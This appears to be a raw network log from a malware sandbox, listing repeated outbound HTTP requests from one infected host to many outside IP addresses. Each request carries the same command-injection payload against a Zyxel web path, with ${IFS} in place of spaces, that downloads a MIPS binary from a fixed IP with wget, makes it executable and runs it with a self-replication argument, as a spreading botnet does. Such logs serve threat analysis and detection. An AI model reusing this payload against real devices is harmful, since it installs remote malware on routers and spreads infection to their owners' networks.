                                                        Jan 28, 2024 10:12:49.338093996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3594192.168.2.144395687.87.102.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338120937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3595192.168.2.1444668138.164.14.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338167906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3596192.168.2.1449314206.185.40.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338215113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3597192.168.2.145857083.52.62.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338228941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3598192.168.2.14446884.10.231.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338260889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3599192.168.2.1444030179.170.190.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338309050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3600192.168.2.1443040162.141.114.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338344097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3601192.168.2.1460780121.90.167.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338397980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3602192.168.2.1460422145.231.52.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338447094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3603192.168.2.145854620.74.122.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338496923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3604192.168.2.1454676200.47.75.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338521957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3605192.168.2.143960658.119.185.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338557005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3606192.168.2.146005493.111.113.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338599920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3607192.168.2.143722091.88.124.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338633060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3608192.168.2.1446548151.127.139.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338687897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3609192.168.2.1439466199.196.252.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338725090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3610192.168.2.1448652108.211.166.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338743925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3611192.168.2.1452520122.178.199.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338784933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3612192.168.2.14527729.6.56.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338809967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3613192.168.2.1453778218.197.73.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338852882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3614192.168.2.1434500157.116.92.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338886023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3615192.168.2.1436824182.68.128.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338939905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3616192.168.2.1445298168.27.68.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338988066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3617192.168.2.143526870.57.43.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339029074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3618192.168.2.1458322168.26.98.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339071035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3619192.168.2.1448922211.78.240.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339107037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3620192.168.2.1434084122.4.3.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339160919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3621192.168.2.145693845.84.254.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339199066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3622192.168.2.144025882.58.46.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339246988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3623192.168.2.1437984223.247.142.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339263916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3624192.168.2.1439114102.248.222.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339286089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3625192.168.2.1444130205.55.234.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339313984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3626192.168.2.1445102140.90.69.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339390039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3627192.168.2.1457792111.166.20.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339423895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3628192.168.2.1439382129.72.136.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339463949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3629192.168.2.145113435.116.233.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339489937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3630192.168.2.1457164160.154.133.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339534998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3631192.168.2.1444272133.121.19.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339580059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3632192.168.2.144682492.53.55.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339610100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3633192.168.2.1443694217.8.135.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339648008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3634192.168.2.1435590178.251.167.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339700937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3635192.168.2.1436734139.57.149.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339735031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3636192.168.2.1453542125.118.213.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339771986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3637192.168.2.146015487.233.53.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339828014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3638192.168.2.14478304.97.159.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339855909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3639192.168.2.1436370211.79.86.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339894056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3640192.168.2.144214827.251.61.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339936972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3641192.168.2.1457072178.249.141.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.339981079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3642192.168.2.1455944223.175.40.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340008020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3643192.168.2.1437110139.19.39.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340032101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3644192.168.2.1458694220.212.208.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340060949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3645192.168.2.145452476.245.169.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340086937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3646192.168.2.1437440105.111.81.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340141058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3647192.168.2.143920624.184.146.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340176105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3648192.168.2.144332261.202.37.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340217113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3649192.168.2.1460012201.255.228.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340265989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3650192.168.2.144146679.72.132.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340295076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3651192.168.2.1440346186.149.46.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340329885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3652192.168.2.1453110149.250.50.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340375900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3653192.168.2.1452300110.155.212.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340400934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3654192.168.2.1458276101.96.77.162443
                                                        TimestampBytes transferredDirectionData
